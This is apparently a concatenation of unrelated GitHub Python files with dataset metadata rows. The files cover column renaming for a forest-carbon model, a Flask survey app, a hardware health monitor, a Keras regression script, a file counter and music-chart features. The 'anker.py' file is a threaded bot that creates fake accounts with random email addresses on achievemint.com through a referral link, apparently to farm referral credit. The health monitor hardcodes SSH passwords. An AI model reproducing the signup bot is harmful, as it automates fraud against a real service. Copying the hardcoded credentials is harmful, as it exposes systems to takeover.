df = pandas.read_csv(str(self.paths.disturbance_events))
# Change #
df = df.rename(columns = {'efficency': 'efficiency',
'sor_type': 'sort_type'})
# Write #
df.to_csv(str(self.paths.disturbance_events), index=False, float_format='%g')
###############################################################################
class CaseRenamer(object):
"""
This class takes our python source files and renames the column variables
to match the new case. It can also operate on the jupyter notebooks.
"""
def __init__(self, base_dir, extension):
# Default attributes #
self.base_dir = Path(base_dir)
self.extension = extension
col_names = {
'ageclass': 'AgeClassID,Size',
'classifiers': 'ClassifierNumber,ClassifierValueID',
'disturbances': 'UsingID,SWStart,SWEnd,HWStart,HWEnd,Min_since_last_Dist,'
'Max_since_last_Dist,Last_Dist_ID,Min_tot_biom_C,Max_tot_biom_C,'
'Min_merch_soft_biom_C,Max_merch_soft_biom_C,Min_merch_hard_biom_C,'
'Max_merch_hard_biom_C,Min_tot_stem_snag_C,Max_tot_stem_snag_C,'
'Min_tot_soft_stem_snag_C,Max_tot_soft_stem_snag_C,Min_tot_hard_stem_snag_C,'
'Max_tot_hard_stem_snag_C,Min_tot_merch_stem_snag_C,Max_tot_merch_stem_snag_C,'
'Min_tot_merch_soft_stem_snag_C,Max_tot_merch_soft_stem_snag_C,'
'Min_tot_merch_hard_stem_snag_C,Max_tot_merch_hard_stem_snag_C,Efficency,'
'Sort_Type,Measurement_type,Amount,Dist_Type_ID,Step',
'yields': 'Sp',
'inventory': 'UsingID,Age,Area,Delay,UNFCCCL,HistDist,LastDist',
'transitions': 'UsingID,SWStart,SWEnd,HWStart,HWEnd,Dist_Type_ID,RegenDelay,ResetAge,Percent',
'treatments': 'Dist_Type_ID,Sort_Type,Efficiency,Min_age,Max_age,Min_since_last,'
'Max_since_last,HWP,RegenDelay,ResetAge,Percent,WD,OWC_Perc,Snag_Perc,'
'Perc_Merch_Biom_rem,Man_Nat',
'database': 'TimeStep, UserDefdClassID, UserDefdClassSetID, UserDefdSubclassID,'
'UserDefdSubClassName, AveAge, Biomass, DistArea,'
'BEF_Tot, BG_Biomass, Tot_Merch, Tot_ABG, BG_Biomass,'
'Vol_Merch, Vol_SubMerch, Vol_Snags, TC, TC_FW_C,'
'Vol_Merch_FW_B, Vol_SubMerch_FW_B, Vol_Snags_FW_B,'
'Vol_SubMerch_IRW_B, Vol_Snags_IRW_B,'
'TOT_Vol_FW_B, DMStructureID, DMColumn, DMRow, DMID',
'products': 'SW_Merch, SW_Foliage, SW_Other, HW_Merch, HW_Foliage, HW_Other, SW_Coarse,'
'SW_Fine, HW_Coarse, HW_Fine, Merch_C_ha,'
'Snag_Perc, OWC_Perc, FW_amount, IRW_amount,'
'SoftProduction, HardProduction, DOMProduction,'
'CO2Production, MerchLitterInput, OthLitterInput,'
'Prov_Carbon, Vol_forest_residues,',
'extras': 'IRW_C, FW_C, IRW_B, FW_B'
}
@property_cached
def cols_before(self):
cols_before = ','.join(self.col_names.values()).split(',')
return list(set(name.strip() for name in cols_before))
@property_cached
def cols_after(self):
return [camel_to_snake(col) for col in self.cols_before]
@property_cached
def code_files(self):
return [f for f in self.base_dir.files if f.extension == self.extension]
def __call__(self):
for file in tqdm(self.code_files):
for old_name, new_name in zip(self.cols_before, self.cols_after):
# Only if it is found enclosed in quotes #
file.replace_word("'%s'" % old_name, "'%s'" % new_name)
# Only if it is with the word 'query' on the same line #
self.replace_word_if_other_word(file, old_name, 'query', new_name)
def replace_word_if_other_word(self, path, word1, word2, replacement_word):
"""
Search the file for a given word, and if found,
check the line in which it appears for another second word,
if both the first and second word are found on the same line,
then replace every occurrence of the first word with
the replacement word.
"""
# The original file #
orig_file = Path(path)
# Create a new file #
result_file = autopaths.tmp_path.new_temp_file()
# Generate the lines #
def new_lines():
for line in orig_file:
if word2 in line: yield line.replace(word1, replacement_word)
else: yield line
# Open input/output files, note: output file's permissions lost #
result_file.writelines(new_lines())
# Switch the files around #
orig_file.remove()
result_file.move_to(orig_file)
###############################################################################
if __name__ == '__main__':
# First part #
converters = [CaseConverter(c) for c in continent]
for converter in tqdm(converters): converter()
for converter in tqdm(converters): converter.fix_spelling()
# Second part #
code_dir = home + "repos/cbmcfs3_runner/cbmcfs3_runner/"
renamer = CaseRenamer(code_dir, '.py')
renamer()
# Third part #
code_dir = home + "repos/bioeconomy_notes/notebooks/"
renamer = CaseRenamer(code_dir, '.md')
renamer()
| xapple/cbmcfs3_runner | scripts/orig/convert_column_case.py | convert_column_case.py | py | 7,647 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.environ.get",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "autopaths.auto_paths.AutoPaths",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "pandas.... |
36872129562 | #! /usr/bin/python3
# -*- coding:utf-8 -*-
from flask import Flask, request, render_template, redirect
import json
import os
app = Flask(__name__)
@app.route('/')
def accueil():
if os.path.exists("db")==False:
os.mkdir("db")
return render_template('index.html')
@app.route('/formule')
def reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
return render_template('formule.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/questions', methods=['POST', 'GET'])
def questions():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
file = open("db/questions.json", "w")
txt = {
"id": len(list_qst),
"question": qst,
"tache": tache
}
list_qst.append(txt)
file.write(json.dumps(list_qst, indent=True))
file.close()
return render_template('questions.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/update_qst', methods=['POST', 'GET'])
def update_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
i = 0
for q in list_qst:
if str(q['id']) == str(id):
list_qst[i]['question'] = qst
list_qst[i]['tache'] = tache
break
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
return redirect('/questions')
@app.route('/taches', methods=['POST', 'GET'])
def taches():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
tache = request.form['tache']
file = open("db/taches.json", "w")
txt = {
"id": len(list_tache),
"tache": tache
}
list_tache.append(txt)
file.write(json.dumps(list_tache, indent=True))
file.close()
return render_template('taches.html', list_tache=list_tache)
@app.route('/update_tache', methods=['POST', 'GET'])
def update_tache():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(id):
list_tache[i]['tache'] = tache
break
i = i+1
file = open("db/taches.json", "w")
file.write(json.dumps(list_tache, indent=True))
file.close()
up_qst()
return redirect('/taches')
def up_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
i = 0
for q in list_qst:
for t in list_tache:
            if str(t['id']) == str(q['tache']['id']):  # match on the question's linked tache id, not the question id
list_qst[i]['tache'] = t
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
@app.route('/add_reponse', methods=['POST', 'GET'])
def add_reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
if request.method == 'POST':
resp = {}
resp['nom'] = request.form['nom']
resp['prenom'] = request.form['prenom']
nom = str(request.form['nom']).upper()+" " + \
str(request.form['prenom']).upper()
resp['sexe'] = request.form['sexe']
resp['profession'] = request.form['profession']
for t in list_tache:
for q in list_qst:
if str(t['id']) == str(q['tache']['id']):
resp['question_'+str(q['id'])] = q
tmp = 'resp'+str(q['id'])
resp['reponse_'+str(q['id'])] = request.form[tmp]
tmp = 'justif'+str(q['id'])
resp['justification_'+str(q['id'])] = request.form[tmp]
list_reponse.append(resp)
file = open("db/reponses.json", "w")
file.write(json.dumps(list_reponse, indent=True))
file.close()
return redirect('/success/'+nom)
else:
return redirect('/formule')
@app.route('/success/<nom>')
def success(nom):
return render_template('success.html', nom=nom)
@app.route('/getData', methods=['POST', 'GET'])
def chart():
res=[]
if request.method == 'POST':
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
for t in list_tache:
out = {}
out['tache'] = t['tache']
out['non'] = 0
out['oui'] = 0
for q in list_qst:
if str(q['tache']['id']) == str(t['id']):
id = str(q['id'])
for r in list_reponse:
if str(r['reponse_'+id]).lower() == "non":
out['non'] = out['non']+1
elif str(r['reponse_'+id]).lower() == "oui":
out['oui'] = out['oui']+1
res.append(out)
return json.dumps(res)
if __name__ == '__main__':
app.run(debug=True)
| yahyalazaar/audit_project | __init__.py | __init__.py | py | 7,848 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": ... |
40988144291 | from pathlib import Path
from typing import Any, Dict
import json
MockData = Dict[str, Any]
class Mock:
"""
A class that holds the `mock.json` file contents
"""
mock: MockData = {}
@staticmethod
def populate(mock_path: Path) -> None:
if not mock_path.exists():
raise Exception(f"Mock file {mock_path} does not exists!")
with mock_path.open("r") as f:
mock_data: MockData = json.load(f)
Mock.mock = mock_data
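# Illustrative usage sketch (assumes a mock.json file exists in the working
# directory): populate the shared class-level cache once, then read it anywhere.
if __name__ == "__main__":
    Mock.populate(Path("mock.json"))
    print(f"loaded {len(Mock.mock)} top-level mock entries")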
| viscript/Ox4Shell | lib/mock.py | mock.py | py | 490 | python | en | code | null | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "json.load",
"line_number": 21,
... |
72640625383 | """
Project: SSITH CyberPhysical Demonstrator
health.py
Author: Ethan Lew <elew@galois.com>
Date: 08/23/2021
Python 3.8.3
O/S: Windows 10
Component Health Monitoring Objects and Components
"""
import threading
import abc
import collections
import re
import requests
import typing
import struct
import socket
import time
import fabric
import can
import subprocess
from cyberphyslib.canlib import TcpBus, UdpBus
import cyberphyslib.canlib.canspecs as canspecs
import cyberphyslib.canlib.componentids as cids
import cyberphyslib.demonstrator.component as cycomp
import cyberphyslib.demonstrator.can as cycan
from cyberphyslib.demonstrator.logger import health_logger
def ip2int(ip):
"""Convert an IP string to an int"""
packedIP = socket.inet_aton(ip)
return struct.unpack("!L", packedIP)[0]
class HealthMonitor(abc.ABC):
"""Health Monitor Interface
Define test interface and health properties
"""
@abc.abstractmethod
def run_health_test(self) -> bool:
"""test to determine if the system monitored is healthy"""
return True
@property
def is_healthy(self) -> bool:
"""health property"""
return self.run_health_test()
@property
def is_unhealthy(self) -> bool:
return not self.is_healthy
class SshMonitor(HealthMonitor):
"""
Health monitoring involving Ssh Connections
"""
def __init__(self, addr: str, user=None, password=None, **kwargs):
# user and password need to be transformed into proper level of fabric
# kwarg hierarchy
if user:
kwargs["user"] = user
if password:
if "connect_kwargs" in kwargs:
kwargs["connect_kwargs"] = {**{"password": password}, **kwargs}
else:
kwargs["connect_kwargs"] = {"password": password}
self.connection_kwargs = kwargs
self.addr: str = addr
def command(self, command: str):
# NOTE: should I persist the connect rather than make a new one each time?
result = fabric.Connection(self.addr, **self.connection_kwargs).run(command, hide=True)
return result
class PingMonitor(HealthMonitor):
"""
    If this monitor can successfully ping the component,
    it considers it healthy.
"""
def __init__(self, addr: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.addr = addr
def run_health_test(self) -> bool:
retCode = subprocess.call(["ping","-w","1",self.addr],
stdout=subprocess.DEVNULL)
if retCode == 0:
return True
else:
return False
class HttpMonitor(HealthMonitor):
"""
Health monitoring involving http connections
"""
request_timeout = 1.0
def __init__(self, addr: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.addr = addr
@abc.abstractmethod
def check_response(self, ret: requests.Response) -> bool:
raise NotImplementedError
def run_health_test(self) -> bool:
try:
ret = requests.get(self.addr, timeout = self.request_timeout)
# check for OK status code
return self.check_response(ret)
except Exception as exc:
health_logger.debug(f"<{self.__class__.__name__}> Exception {exc} has occurred")
return False
class ServiceMonitor(SshMonitor):
"""
Health monitoring of a service on a remote machine (via Ssh)
"""
def __init__(self, service_name: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.service_name = service_name
def run_health_test(self) -> bool:
try:
ret = self.command(rf"systemctl status {self.service_name}")
# regex match for active and running service
return re.search(r"(Active: active \(running\))", ret.stdout) is not None
except Exception as exc:
health_logger.debug(f"<{self.__class__.__name__}> Exception {exc} has occurred")
return False
class OtaMonitor(HttpMonitor):
"""
Monitor Infotainment Ota Process (via HTTP request)
"""
def check_response(self, ret: requests.Response) -> bool:
return ret.status_code == 200
HeartbeatResponseType = typing.Tuple[float, float]
class BusHeartbeatMonitor(HealthMonitor):
"""
Heartbeat monitor is responsible for
1. sending out the heartbeat requests (REQ)
2. listening for heartbeat acknowledgements (ACK)
3. determining system health from ACK patterns
"""
# length of response buffers (time horizon of ACKs)
maxlen = 5
wait_period = 10.0
@staticmethod
def form_heartbeat_req_msg(req_number: int):
"""form REQ can packet"""
msg = can.Message(arbitration_id=canspecs.CAN_ID_HEARTBEAT_REQ,
data=struct.pack(canspecs.CAN_FORMAT_HEARTBEAT_REQ, req_number))
return msg
def __init__(self, client_ids: typing.Sequence[int]):
self.curr_req_number = 0
self.response_buffer: typing.Dict[int, typing.Deque[float]] = {
c: collections.deque(maxlen=self.maxlen) for c in client_ids
}
self.start_time = time.time()
def submit_response(self, client_id: int, response: HeartbeatResponseType):
"""submit a response from client_id to the ACK buffer"""
if client_id not in self.response_buffer:
# TODO: FIXME: add fault location
idmap = {v: k for k, v in cids.__dict__.items() if isinstance(v, int)}
cname = idmap.get(client_id, "<UNKNOWN>")
print(f"WARNING! Received unanticipated response {client_id} ({cname})")
else:
if response is not None:
self.response_buffer[client_id].append(time.time())
def get_req_msg(self) -> can.Message:
"""generate REQ msg"""
m = self.form_heartbeat_req_msg(self.curr_req_number)
self.curr_req_number += 1
return m
def run_health_test(self) -> bool:
"""implement the heartbeat health:
for a given history of component with component id cid, if the maximum value is
within MAXLEN of the current REQ number, the component is considered healthy
"""
return all(self.run_health_tests())
def run_health_tests(self) -> typing.Dict[typing.Hashable, bool]:
"""return health result for each component entered in the response buffer"""
outcome = {k: True for k in self.response_buffer.keys()}
for cid, buff in self.response_buffer.items():
if len(buff) > 0:
ltime = max(buff)
delta = time.time() - ltime
if delta > self.maxlen:
health_logger.debug(f"ERROR: Component with ID {cid} Has Failed Heartbeat Health Test!")
outcome[cid] = False
else:
if time.time() - self.start_time > self.wait_period:
health_logger.debug(f"ERROR: Component with ID {cid} Has Failed Heartbeat Health Test (No Submissions)!")
outcome[cid] = False
return outcome
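# --- Editor's addition: a hypothetical usage sketch, not part of the original module. ---
# It walks through the REQ/ACK cycle described in the BusHeartbeatMonitor docstring above;
# the client ids (1, 2) and the fake ACK payload are assumptions for illustration only.
def _bus_heartbeat_demo():
    monitor = BusHeartbeatMonitor(client_ids=[1, 2])
    req_msg = monitor.get_req_msg()                  # REQ packet to broadcast on the CAN bus
    monitor.submit_response(1, (time.time(), 0.0))   # pretend client 1 answered with an ACK
    return req_msg, monitor.run_health_tests()       # e.g. {1: True, 2: True} inside wait_period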
class HeartbeatMonitor(threading.Thread):
FREQUENCY = 0.1
def __init__(self):
threading.Thread.__init__(self,daemon=True)
self.services = {
cids.CAN_DISPLAY_FRONTEND:
{
"user" : "pi",
"password": "WelcomeToGalois",
"address" : "10.88.88.5",
"service_name": "can-ui"
},
cids.HACKER_KIOSK_FRONTEND:
{
"user" : "galoisuser",
"password": "WelcomeToGalois",
"address" : "10.88.88.3",
"service_name": "hacker-ui"
},
cids.INFOTAINMENT_THIN_CLIENT:
{
"user" : "pi",
"password": "WelcomeToGalois",
"address" : "10.88.88.2",
"service_name": "infotainment"
}
}
self.https = {
cids.OTA_UPDATE_SERVER_1 : "http://10.88.88.11:5050",
cids.OTA_UPDATE_SERVER_2 : "http://10.88.88.21:5050",
cids.OTA_UPDATE_SERVER_3 : "http://10.88.88.31:5050"
}
self.pings = {
cids.DEBIAN_1 : "10.88.88.11",
cids.FREERTOS_1: "10.88.88.12",
cids.DEBIAN_2_LMCO : "10.88.88.21",
cids.FREERTOS_2_CHERI: "10.88.88.22",
cids.DEBIAN_3 : "10.88.88.31",
cids.FREERTOS_3: "10.88.88.32"
}
self.heartbeat_desc = {
# TCP components
cids.BESSPIN_TOOL_FREERTOS: cids.BESSPIN_TOOL_FREERTOS,
cids.BESSPIN_TOOL_DEBIAN: cids.BESSPIN_TOOL_DEBIAN,
cids.CAN_DISPLAY_BACKEND: cids.CAN_DISPLAY_BACKEND,
cids.HACKER_KIOSK_BACKEND: cids.HACKER_KIOSK_BACKEND,
cids.INFOTAINMENT_BACKEND: cids.INFOTAINMENT_BACKEND,
# UDP components
# NOTE: only active network components can respond
#cids.INFOTAINMENT_SERVER_1: ip2int('10.88.88.11'),
#cids.INFOTAINMENT_SERVER_2: ip2int('10.88.88.21'),
#cids.INFOTAINMENT_SERVER_3: ip2int('10.88.88.31'),
            # FreeRTOS is temporarily handled via pings
#cids.FREERTOS_1: ip2int('12.88.88.10'),
#cids.FREERTOS_2_CHERI: ip2int('22.88.88.10'),
#cids.FREERTOS_3: ip2int('32.88.88.10')
}
self.component_monitor = BusHeartbeatMonitor(self.heartbeat_desc)
self.ping_monitors = {k: PingMonitor(addr) for k, addr in self.pings.items()}
self.ota_monitors = {k: OtaMonitor(addr) for k, addr in self.https.items()}
self.service_monitors = {k: ServiceMonitor(params["service_name"], params["address"],
user=params["user"],
password=params["password"]) for k, params in self.services.items()}
self._health_report = {}
def run(self):
while True:
ret = {}
health_logger.debug("Testing OTA")
for k, v in self.ota_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} HTTP failed health check")
health_logger.debug("Testing Services")
for k, v in self.service_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} Service failed health check")
health_logger.debug("Testing Ping")
for k, v in self.ping_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} Ping failed health check")
health_logger.debug("Testing TCP")
health_report = self.component_monitor.run_health_tests()
kmap = {v: k for k, v in self.heartbeat_desc.items()}
ret.update({kmap[k]: v for k, v in health_report.items()})
if not all(health_report.values()):
health_logger.debug(f"Health Status: {health_report}")
health_logger.debug(f"ERROR! TCP Failed")
self._health_report = ret
@property
def health_report(self):
return self._health_report
| GaloisInc/BESSPIN-Tool-Suite | besspin/cyberPhys/cyberphyslib/cyberphyslib/demonstrator/healthmonitor.py | healthmonitor.py | py | 11,624 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "socket.inet_aton",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "abc.ABC",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "abc.abstractmethod",
... |
16589607570 | import random
import requests
import codecs
import json
import re
import queue
import time
from threading import Thread
requests.packages.urllib3.disable_warnings()
proxy = '127.0.0.1:8888'
def sec():
while True:
headers = {
'Referer': 'https://www.achievemint.com/signup?referral=1&utm_campaign=YOaBLXQNLBg%3D%0A',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2767.4 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
c = '{0}@gmail.com'.format(random.randint(999999,999999999999))
work = False
prozy = {
'http': proxy,
'https': proxy
}
s = requests.session()
r = s.get(
"http://tinyurl.com/k44xy3f",
verify=False,
timeout=6,
proxies=prozy,
headers=headers
)
auth = re.findall('authenticity_token" value="(.*?)"', r.text)[0]
va = re.findall('acceptedTos" type="checkbox" value="(.*?)"', r.text)[0]
r = s.post(
"https://www.achievemint.com/",
'utf8=%e2%9c%93&authenticity_token={0}&after_sign_up_path=&user[confirmation_token]=&user[signup_token]=&user[email]={1}&user[password]=dsfdsf@D&user[accepted_tos]=1&user[accepted_tos]={2}&button='.format(auth, c, va),
verify=False,
timeout=6,
proxies=prozy,
headers=headers
)
if 'Welcome to Achievemint!' in r.text:
print(1)
except:
pass
def main():
for _ in range(3):
worker = Thread(target=sec, args=())
worker.start()
if __name__ == '__main__':
main() | breitingerchris/public_code | Python/Achievemint/anker.py | anker.py | py | 1,509 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.packages.urllib3.disable_warnings",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "requests.packages",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 21,
"usage_type": "call"
},
{
"... |
4828779456 | import torch
from torch import nn
import pickle
from model import WideResNet
from autoattack import AutoAttack
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torchvision import datasets, transforms, models
class ImageDataset(Dataset):
def __init__(self, file):
super().__init__()
data, label = pickle.load(open(file,'rb'))
self.data = self.transform(data)
self.label = label
def transform(self, data):
data = torch.Tensor(data).permute(0,3,1,2).contiguous().div(255)
transform_func = transforms.Compose([
transforms.RandomCrop(size = data.shape[-1], padding = 2),
transforms.RandomHorizontalFlip(),
transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),
std=(0.247, 0.243, 0.261))]
)
augmented_data = transform_func(data)
return augmented_data
def __getitem__(self, idx):
return self.data[idx], self.label[idx]
def __len__(self):
return len(self.label)
device = 2
batch_size = 1024
#model = WideResNet(32,10).to(device)
ds = ImageDataset('./data/cifar_train.pt')
model = models.__dict__['resnet50']().to(device)
model.load_state_dict(torch.load('./save/model.pt'))
transform_func = transforms.Compose([transforms.ToTensor(),
transforms.RandomCrop(size = 32, padding = 2),
transforms.RandomHorizontalFlip(),
transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),
std=(0.247, 0.243, 0.261))])
#ds = datasets.CIFAR10('data',train=True,transform=transform_func)
dl = DataLoader(ds,batch_size=batch_size,shuffle=True,pin_memory=True)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), 0.001)
model.eval()
while True:
for i, (x,y) in enumerate(dl,start=1):
x = x.to(device)
y = y.to(device)
optimizer.zero_grad()
pred = model(x)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
print(i, ((pred.argmax(-1)==y).sum()/len(y)).item(), loss.item())
if i%10==0: torch.save(model.state_dict(),'./save/model.pt')
| AmadeusloveIris/AutoAdversarialTraining | test.py | test.py | py | 2,316 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pickle.load",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torchvision.transfo... |
19915052730 | """
Write a function that takes a directory path, a file extension and an optional tokenizer.
It will count lines in all files with that extension if there is no tokenizer.
If the tokenizer is not None, it will count tokens.
For dir with two files from hw1.py:
#>>> universal_file_counter(test_dir, "txt")
6
#>>> universal_file_counter(test_dir, "txt", str.split)
6
"""
import glob
import os
from pathlib import Path
from typing import Callable, Generator, Optional, TextIO
def tokenizer_generator(file_handler: TextIO, tok: Optional[Callable]) -> Generator[int, None, None]:
buffer = ""
char = " "
while True:
char = file_handler.read(1)
if not char:
yield 1 # buffer
break
buffer += char
if len(tok(buffer)) == 1:
continue
else:
yield 1 # tok(buffer)[0]
buffer = tok(buffer)[1]
def universal_file_counter(
dir_path: Path, file_extension: str, tokenizer: Optional[Callable] = None
) -> int:
counter = 0
for file in Path(dir_path).glob("*." + file_extension):
with open(file) as f:
if tokenizer is not None:
for token in tokenizer_generator(f, tokenizer):
counter += token
else:
counter += sum(1 for _ in f)
return counter
| Abbath90/python_epam | homework9/task3/file_counter.py | file_counter.py | py | 1,333 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TextIO",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Callable",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"lin... |
20604733756 | from sklearn import preprocessing
from pandas import read_csv
from sklearn.model_selection import train_test_split
from keras.layers import Dense
from keras.models import Sequential
from keras.optimizers import Adam
from sklearn.metrics import r2_score
from matplotlib import pyplot as plt
df = read_csv("C:\Code\RNASeqAnalysis\Data\CentData.csv", header = 0)
survival = df.Survival
genelist = df.drop(["UUID", "Survival"], axis = 1)
scaler = preprocessing.StandardScaler().fit(genelist)
X_train, X_val, Y_train, Y_val = train_test_split(genelist, survival, test_size = .2)
X_tprep = scaler.transform(X_train)
X_vprep = scaler.transform(X_val)
#print(X_vprep, X_vprep, Y_train, Y_val)
model = Sequential()
model.add(Dense(750, input_shape = (60488,), activation ='relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(1,))
model.compile(Adam(lr = .00000075), 'mean_squared_error')
history = model.fit(X_tprep,Y_train, epochs = 6500, validation_split = .25, verbose = 0)
print("Model compiled and trained")
Yval_pred = model.predict(X_vprep)
rscore = r2_score(Y_val,Yval_pred)
Yval_pred2 = model.predict(X_tprep)
rscore1 = r2_score(Y_train, Yval_pred2)
print("R2 score (Validation Data): " + str(rscore))
print("R2 score (Training Data): " + str(rscore1))
model.save(R'C:\Users\tjmcg\source\repos\RNAseqFinal\RNAseqFinal\weights.h5')
history_dict = history.history
plt.figure()
plt.yscale("log")
plt.plot(history_dict['loss'], 'bo', label = 'training loss')
plt.plot(history_dict['val_loss'], 'r', label = 'val training loss')
plt.show()
| taytay191/RNAseqAnalysis | RNAseqFinal/model.py | model.py | py | 1,905 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.StandardScaler",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 14,
"usage_type": "name"
},
{
"api_na... |
2063569811 | from functools import cache
from . import get_track_data, get_countries_charts
import pandas as pd
@cache
def get_basic_track_features():
tracks = get_track_data()
isrc_cols = tracks.columns[tracks.columns.str.contains("isrc")].tolist()
album_cols = tracks.columns[tracks.columns.str.contains("album")].tolist()
artist_cols = tracks.columns[tracks.columns.str.contains("artist")].tolist()
other_irrelevant_cols = ["name", "preview_url", "genres"]
irrelevant_cols = isrc_cols + album_cols + artist_cols + other_irrelevant_cols
track_feats = tracks.drop(columns=irrelevant_cols)
track_feats["single_release"] = tracks.album_type == "single"
track_feats = track_feats.dropna()
return track_feats
countries_charts = get_countries_charts()
track_feats = get_basic_track_features()
@cache
def get_track_feature_region_dataset():
"""
Returns a dataframe with the track features for each track that only charted in one region. Oceania is removed because of low number of observations.
"""
charting_tracks_by_region = countries_charts.drop_duplicates(
subset=["id", "geo_region"]
)[["id", "geo_region"]].rename(columns={"geo_region": "region"})
tracks_charting_only_in_one_region = charting_tracks_by_region[
~charting_tracks_by_region.duplicated(keep=False, subset=["id"])
].reset_index(drop=True)
region_tracks_features = pd.merge(
track_feats, tracks_charting_only_in_one_region, on="id"
).set_index("id")
region_track_feats_dataset = region_tracks_features.copy().loc[
region_tracks_features.region != "Oceania"
]
region_track_feats_dataset.region = (
region_track_feats_dataset.region.cat.remove_unused_categories()
)
return region_track_feats_dataset
@cache
def get_track_feature_subregion_dataset():
"""
Returns a dataframe with the track features for each track that only charted in one out of four hand-picked subregion
(Western Europe, Northern America, Eastern Asia, or Latin America and the Caribbean).
"""
charting_tracks_by_subregion = countries_charts.drop_duplicates(
subset=["id", "geo_subregion"]
